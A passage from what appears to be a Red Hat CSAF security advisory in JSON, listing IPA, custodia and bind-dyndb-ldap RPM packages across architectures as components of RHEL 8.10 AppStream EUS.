"product_id": "AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1"
},
"product_reference": "bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "custodia-0.6.0-3.module+el8.9.0+18911+94941f82.noarch.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:custodia-0.6.0-3.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1"
},
"product_reference": "custodia-0.6.0-3.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "custodia-0.6.0-3.module+el8.9.0+18911+94941f82.src.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:custodia-0.6.0-3.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1"
},
"product_reference": "custodia-0.6.0-3.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-4.9.13-9.module+el8.10.0+21691+df63127d.src.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-4.9.13-9.module+el8.10.0+21691+df63127d.src.rpm-idm:DL1"
},
"product_reference": "ipa-4.9.13-9.module+el8.10.0+21691+df63127d.src.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-4.9.13-9.module+el8.10.0+21692+c9b201bc.src.rpm (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-4.9.13-9.module+el8.10.0+21692+c9b201bc.src.rpm-idm:client"
},
"product_reference": "ipa-4.9.13-9.module+el8.10.0+21692+c9b201bc.src.rpm-idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1"
},
"product_reference": "ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1"
},
"product_reference": "ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1"
},
"product_reference": "ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1"
},
"product_reference": "ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client"
},
"product_reference": "ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client"
},
"product_reference": "ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client"
},
"product_reference": "ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client"
},
"product_reference": "ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-common-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-common-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1"
},
"product_reference": "ipa-client-common-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-common-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-common-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client"
},
"product_reference": "ipa-client-common-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1"
},
"product_reference": "ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1"
},
"product_reference": "ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1"
},
"product_reference": "ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1"
},
"product_reference": "ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client"
},
"product_reference": "ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client"
},
"product_reference": "ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client"
},
"product_reference": "ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client"
},
"product_reference": "ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1"
},
"product_reference": "ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1"
},
"product_reference": "ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1"
},
"product_reference": "ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1"
},
"product_reference": "ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client"
},
"product_reference": "ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client"
},
"product_reference": "ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client"
},
"product_reference": "ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client"
},
"product_reference": "ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1"
},
"product_reference": "ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1"
},
"product_reference": "ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1"
},
"product_reference": "ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1"
},
"product_reference": "ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client"
},
"product_reference": "ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client"
},
"product_reference": "ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client"
},
"product_reference": "ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client"
},
"product_reference": "ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-common-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-common-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1"
},
"product_reference": "ipa-common-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-common-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-common-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client"
},
"product_reference": "ipa-common-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1"
},
"product_reference": "ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1"
},
"product_reference": "ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1"
},
"product_reference": "ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1"
},
"product_reference": "ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client"
},
"product_reference": "ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client"
},
"product_reference": "ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client"
},
"product_reference": "ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client"
},
"product_reference": "ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1"
},
"product_reference": "ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1"
},
"product_reference": "ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1"
},
"product_reference": "ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1"
},
"product_reference": "ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client"
},
